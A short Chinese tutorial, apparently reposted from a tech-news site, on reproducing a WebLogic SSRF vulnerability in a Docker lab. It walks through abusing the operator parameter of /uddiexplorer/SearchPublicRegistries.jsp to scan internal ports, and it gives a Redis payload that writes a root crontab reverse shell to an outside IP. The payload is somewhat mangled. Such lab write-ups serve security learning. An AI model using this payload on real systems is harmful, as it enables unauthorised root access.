一、使用docker搭建环境
docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html
访问7001端口
二、漏洞复现步骤
1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp
2、检查一下IBM这个地方看看
发现是个连接,这就可能存在ssrf了
3、使用burp suite抓包,点击Search
4、修改operator参数的连接
5、访问结果
访问不存在的端口返回 could not connect over HTTP
访问存在的端口返回状态码
访问内网
利用redis反弹shell的payload
set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1nnnn"config set dir /etc/config set dbfilename crontabsave
看完上述内容,你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。
文章标题:如何实现Weblogic SSRF漏洞复现,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/29260
微信扫一扫 
支付宝扫一扫 
